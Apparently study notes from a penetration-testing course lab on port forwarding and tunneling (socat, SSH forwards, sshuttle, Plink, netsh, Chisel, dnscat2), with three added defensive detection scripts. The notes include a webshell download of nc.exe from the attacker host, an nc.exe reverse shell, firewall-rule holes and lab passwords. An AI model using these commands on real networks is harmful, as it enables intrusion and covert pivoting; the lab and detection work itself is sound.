Port Redirection and Tunneling


### Port Forwarding with socat

On CONFLUENCE01, we'll start a verbose (-ddd) socat process. It will listen on TCP port 2345 (TCP-LISTEN:2345), fork into a new subprocess when it receives a connection (fork) instead of exiting after a single connection, then forward all traffic it receives to TCP port 5432 on PGDATABASE01 (TCP:10.4.50.215:5432).

CONFLUENCE01$ socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432

kali$ psql -h 192.168.50.63 -p 2345 -U postgres

### SSH port forwarding

confluence$ python3 -c 'import pty; pty.spawn("/bin/bash")'
ssh database_admin@10.4.50.215

# on db01, check which hosts have SMB (445) open
database_admin@pgdatabase01:~$ for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done;
# found 172.16.50.217:445

# local port forwarding with SSH
ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215
#netmap
# kali > confluence > db01 > smb.217

# now open another reverse shell on confluence, then list the shares
kali$ smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234
# then connect
smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234

### SSH dynamic Port Forwarding and Proxychains

confluence@confluence01:/opt/atlassian/confluence/bin$ 
ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215

kali$ tail /etc/proxychains4.conf
# socks5 192.168.50.63 9999

proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234
proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217

### SSH Remote Port Forwarding

Same setup, but CONFLUENCE01 can only accept inbound connections on TCP/8090 because of firewall rules, so we leverage the SSH client on CONFLUENCE01 instead: outbound ports are not blocked.

confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4
# 127.0.0.1:2345 is the listening socket on the remote end (kali, where the connection lands)
# 10.4.50.215:5432 is the forwarding socket

kali$ psql -h 127.0.0.1 -p 2345 -U postgres

Now all traffic sent to 127.0.0.1:2345 on kali takes this route:

127.0.0.1:2345 (kali) -> SSH client on confluence -> forwarded to 10.4.50.215:5432

### SSH dynamic remote port forwarding

confluence01$ ssh -N -R 9998 kali@192.168.118.4
# check established connections
ss -ntplu

kali$ tail proxychains4.conf
# socks5 127.0.0.1 9998

kali$ proxychains nmap 10.4.50.64
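Every forward in the socat and SSH sections above leaves a listening socket behind on the pivot host, and that socket is what a defender hunts for. The following is an added example (my code, not part of these notes) that parses `ss -ntplu` output, the same command run on CONFLUENCE01 above, and reports listeners owned by relay tools such as socat, ssh or chisel, distinguishing sockets exposed on all interfaces from loopback-only ones. The sample `ss` output is constructed; ports 2345 and 9999 mirror the socat and `ssh -D` listeners set up above.

```python
import re
from typing import Dict, List

# Process names that rarely have a legitimate reason to own a LISTEN socket on
# a server; each of them appears as a relay somewhere in these notes.
RELAY_PROCESSES = {"socat", "ssh", "chisel", "plink", "nc", "ncat"}

# Constructed sample of `ss -ntplu` output (not captured from a real host).
SAMPLE_SS = """\
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
tcp   LISTEN 0      128    0.0.0.0:2345        0.0.0.0:*         users:(("socat",pid=1234,fd=5),("socat",pid=1235,fd=5))
tcp   LISTEN 0      128    0.0.0.0:9999        0.0.0.0:*         users:(("ssh",pid=2345,fd=4))
tcp   LISTEN 0      128    127.0.0.1:5432      0.0.0.0:*         users:(("postgres",pid=800,fd=7))
tcp   LISTEN 0      4096   0.0.0.0:8090        0.0.0.0:*         users:(("java",pid=900,fd=30))
tcp   LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=650,fd=3))
tcp   ESTAB  0      0      10.4.50.63:51234    10.4.50.215:22    users:(("ssh",pid=2345,fd=3))
udp   UNCONN 0      0      127.0.0.53%lo:53    0.0.0.0:*         users:(("systemd-resolve",pid=500,fd=12))
"""

# One ss row: netid, state, queues, local addr:port, peer addr:port, process info.
ROW_RE = re.compile(
    r"^(?P<netid>tcp|udp)\s+(?P<state>\S+)\s+\d+\s+\d+\s+"
    r"(?P<laddr>\S+):(?P<lport>\d+|\*)\s+(?P<raddr>\S+):(?P<rport>\S+)"
    r"(?:\s+(?P<proc>\S.*))?\s*$"
)
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')


def parse_ss(text: str) -> List[Dict]:
    """Turn `ss -ntplu` output into one dict per socket row (header skipped)."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        procs = PROC_RE.findall(m.group("proc") or "")
        rows.append({
            "proto": m.group("netid"),
            "state": m.group("state"),
            "laddr": m.group("laddr").split("%")[0],  # drop scope id such as %lo
            "lport": m.group("lport"),
            "raddr": m.group("raddr"),
            "process": procs[0][0] if procs else "",
            "pids": [int(pid) for _, pid in procs],
        })
    return rows


def is_loopback(addr: str) -> bool:
    return addr.startswith("127.") or addr in ("::1", "[::1]")


def find_relay_listeners(text: str) -> List[Dict]:
    """Listening sockets owned by known relay tools, sorted by port.

    'exposed' is True when the socket is bound to something other than
    loopback, i.e. reachable from other hosts (like 0.0.0.0:2345 above).
    """
    hits = []
    for row in parse_ss(text):
        listening = row["state"] == "LISTEN" or (row["proto"] == "udp" and row["state"] == "UNCONN")
        if listening and row["process"] in RELAY_PROCESSES:
            hits.append({**row, "exposed": not is_loopback(row["laddr"])})
    return sorted(hits, key=lambda r: int(r["lport"]) if r["lport"].isdigit() else -1)


if __name__ == "__main__":
    for hit in find_relay_listeners(SAMPLE_SS):
        where = "EXPOSED" if hit["exposed"] else "loopback"
        print(f"{hit['proto']} {hit['laddr']}:{hit['lport']} {hit['process']} pids={hit['pids']} {where}")
```

The established `ssh` connection to 10.4.50.215:22 is deliberately not reported: an outbound SSH client session is normal, while an `ssh` process that *owns a listener* is a `-D`/`-L` forward. Feed real output with `ss -ntplu | python3 script.py` after swapping `SAMPLE_SS` for `sys.stdin.read()`.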

### SSHuttle

sshuttle is a tool that turns an SSH connection into something similar to a VPN by setting up local routes that force traffic through the SSH tunnel. It requires root privileges on the SSH client and Python3 on the SSH server.

# setup tunneling
confluence@confluence01:/opt/atlassian/confluence/bin$
socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22

kali@kali:~$ sshuttle -r database_admin@192.168.50.63:2222 10.4.50.0/24 172.16.50.0/24

kali@kali:~$ smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234

### ssh.exe

confluence01RDP\> where ssh
ssh -N -R 9998 kali@192.168.118.4

kali$ tail /etc/proxychains4.conf
# socks5 127.0.0.1 9998

kali$ proxychains psql -h 10.4.50.215 -U postgres

### Plink

When ssh.exe is not present on the Windows host:

# 1. upload a webshell and have that host download nc.exe from our kali host
kali$ sudo system
kali$ sudo cp /usr/share/windows-resources/binaries/nc.exe /var/www/html

webshell> powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe

webshell> C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446
# same process to download plink.exe in the webshell host

webshell> C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4

kali@kali:~$ xfreerdp /u:rdp_admin /p:Password! /v:127.0.0.1:9833

### netsh

When Windows is the host that acts as the proxy and inbound traffic to it is not allowed, but we have an admin shell on that Windows host:

# connect rdp
C:\Windows\system32> netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215

netstat -anp TCP | find "2222"
netsh interface portproxy show all

# We can use the netsh advfirewall firewall subcontext to create the hole
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow

# to remove (the rule name must match the one created above)
netsh advfirewall firewall delete rule name="port_forward_ssh_2222"

netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64
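A portproxy entry persists across reboots and is easy to overlook, so auditing them is a cheap defensive check. The script below is an added example (my code, not from these notes or from Microsoft): it parses the table that `netsh interface portproxy show all` prints, as run above, and flags entries that expose a non-loopback listener and relay it into a different /24 than the one it listens on, which is exactly the 192.168.50.64 -> 10.4.50.215 pivot shape. The sample output is constructed from that entry plus a benign loopback-only one.

```python
import ipaddress
import re
from typing import List, Tuple

# (listen address, listen port, connect address, connect port)
Entry = Tuple[str, int, str, int]

# Constructed sample of `netsh interface portproxy show all` output
# (same column layout netsh prints, values taken from the notes above).
SAMPLE_PORTPROXY = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
192.168.50.64   2222        10.4.50.215     22
127.0.0.1       8080        127.0.0.1       80
"""

ROW_RE = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")


def parse_portproxy(text: str) -> List[Entry]:
    """Return every data row of the portproxy table as an Entry tuple."""
    entries: List[Entry] = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # blank lines, section titles, column headers, separators
        try:
            ipaddress.ip_address(m.group(1))
            ipaddress.ip_address(m.group(3))
        except ValueError:
            continue  # not an address pair, skip defensively
        entries.append((m.group(1), int(m.group(2)), m.group(3), int(m.group(4))))
    return entries


def find_pivots(text: str, prefix: int = 24) -> List[Entry]:
    """Flag entries whose listener is reachable from the network (not loopback)
    and whose target lies outside the listener's own /prefix subnet, i.e. the
    host is relaying traffic into another network segment."""
    pivots: List[Entry] = []
    for entry in parse_portproxy(text):
        listen_ip = ipaddress.ip_address(entry[0])
        connect_ip = ipaddress.ip_address(entry[2])
        if listen_ip.is_loopback:
            continue
        listen_net = ipaddress.ip_network(f"{listen_ip}/{prefix}", strict=False)
        if connect_ip not in listen_net:
            pivots.append(entry)
    return pivots


if __name__ == "__main__":
    for laddr, lport, caddr, cport in find_pivots(SAMPLE_PORTPROXY):
        print(f"cross-segment portproxy: {laddr}:{lport} -> {caddr}:{cport}")
```

On a real host, pipe the command output in (for example `netsh interface portproxy show all > pp.txt` and read the file) and compare the result against a known-good baseline; in most environments any entry at all deserves a look.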

### HTTP Tunneling

Scenario: CONFLUENCE01 accepts inbound connections on 8090 only, and outbound traffic is blocked except for HTTP.

Tool: Chisel -> encapsulates the traffic in an HTTP tunnel.

kali$ chisel server --port 8080 --reverse

victim$ /tmp/chisel client 192.168.118.4:8080 R:socks > /dev/null 2>&1 &

# now we'll pass an Ncat command to ProxyCommand so SSH goes through the SOCKS proxy chisel opened on kali
kali$ ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215

### DNS Tunneling

How to perform DNS tunneling with a tool called dnscat2.

# we need to initiate DNS requests from PGDATABASE01
# and monitor what comes in to FELINEAUTHORITY

felineauthority:~$ cd dns_tunneling
cat dnsmasq.conf
# Define the zone
auth-zone=feline.corp
auth-server=feline.corp

sudo dnsmasq -C dnsmasq.conf -d

pgdatabase01:~$ resolvectl status
nslookup exfiltrated-data.feline.corp

felineauthority:~$ cat dnsmasq_txt.conf
# Define the zone
auth-zone=feline.corp
auth-server=feline.corp

# TXT records
txt-record=www.feline.corp,here's something useful!
txt-record=www.feline.corp,here's something else less useful.

sudo dnsmasq -C dnsmasq_txt.conf -d

pgdatabase01:~$ nslookup -type=txt www.feline.corp

## start server
felineauthority:~$ dnscat2-server feline.corp

## connect client
pgdatabase01:~/dnscat$ ./dnscat feline.corp

## interactive
dnscat2> windows
windows -i 1
listen 127.0.0.1:4455 172.16.50.217:445
smbclient -p 4455 -L //127.0.0.1 -U hr_admin --password=Welcome123
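From the authoritative server's point of view, dnscat2 traffic looks like the nslookup queries above, only far more of them, with encoded data in the leftmost label and a skew towards TXT/CNAME/MX lookups. As an added example of the detection side (my code, not part of these notes or of dnscat2), the script below scores dnsmasq-style query log lines per zone by query count, distinct names and leftmost-label length, and flags zones that behave like a tunnel endpoint. The log lines are constructed; their shape follows dnsmasq's `query[TYPE] name from client` output, and the hex labels are synthetic payload chunks generated from a hash.

```python
import hashlib
import math
import re
from collections import Counter, defaultdict
from typing import Dict, List

QUERY_RE = re.compile(r"query\[(?P<qtype>[A-Z]+)\]\s+(?P<name>\S+)\s+from\s+(?P<client>\S+)")


def _constructed_log() -> List[str]:
    """Sample dnsmasq-style log lines: some ordinary traffic for feline.corp
    and example.com, then a burst mimicking a dnscat2 client (long hex labels
    under feline.corp, cycling through TXT/CNAME/MX)."""
    lines = [
        "dnsmasq: query[A] www.feline.corp from 10.4.50.215",
        "dnsmasq: query[TXT] www.feline.corp from 10.4.50.215",
        "dnsmasq: query[A] exfiltrated-data.feline.corp from 10.4.50.215",
        "dnsmasq: query[A] updates.example.com from 10.4.50.215",
        "dnsmasq: query[A] updates.example.com from 10.4.50.215",
        "dnsmasq: query[A] updates.example.com from 10.4.50.215",
    ]
    for i in range(8):
        label = hashlib.sha256(f"chunk-{i}".encode()).hexdigest()[:40]  # synthetic chunk
        qtype = ("TXT", "CNAME", "MX")[i % 3]
        lines.append(f"dnsmasq: query[{qtype}] {label}.feline.corp from 10.4.50.215")
    return lines


SAMPLE_LOG = _constructed_log()


def shannon_entropy(s: str) -> float:
    """Bits per character of a label; hex payload sits near 4, words near 2-3."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def zone_stats(lines: List[str]) -> Dict[str, Dict]:
    """Aggregate queries per zone, where the zone is the last two labels."""
    acc = defaultdict(lambda: {"queries": 0, "names": set(), "lens": [], "ent": [], "qtypes": Counter()})
    for line in lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        labels = m.group("name").rstrip(".").lower().split(".")
        if len(labels) < 2:
            continue
        s = acc[".".join(labels[-2:])]
        s["queries"] += 1
        s["names"].add(m.group("name").lower())
        s["lens"].append(len(labels[0]))
        s["ent"].append(shannon_entropy(labels[0]))
        s["qtypes"][m.group("qtype")] += 1
    return {
        zone: {
            "queries": s["queries"],
            "distinct_names": len(s["names"]),
            "mean_label_len": sum(s["lens"]) / len(s["lens"]),
            "mean_entropy": sum(s["ent"]) / len(s["ent"]),
            "qtypes": dict(s["qtypes"]),
        }
        for zone, s in acc.items()
    }


def flag_tunnel_zones(lines: List[str], min_distinct: int = 5, min_mean_label_len: int = 20) -> List[str]:
    """Zones with many distinct, long leftmost labels. Entropy is reported but
    not used for the decision: a short ordinary name such as 'exfiltrated-data'
    already scores above 3 bits, so on its own it would be noisy."""
    stats = zone_stats(lines)
    return sorted(z for z, s in stats.items()
                  if s["distinct_names"] >= min_distinct and s["mean_label_len"] >= min_mean_label_len)


if __name__ == "__main__":
    for zone, s in zone_stats(SAMPLE_LOG).items():
        print(f"{zone}: {s['queries']} queries, {s['distinct_names']} names, "
              f"mean label len {s['mean_label_len']:.1f}, mean entropy {s['mean_entropy']:.2f}, {s['qtypes']}")
    print("suspected tunnel zones:", flag_tunnel_zones(SAMPLE_LOG))
```

Run dnsmasq with `log-queries` (or read the output of `dnsmasq -d` shown above) and feed the lines in; the thresholds are starting points and should be tuned against a baseline, since CDN and anti-spam zones also produce many distinct long names.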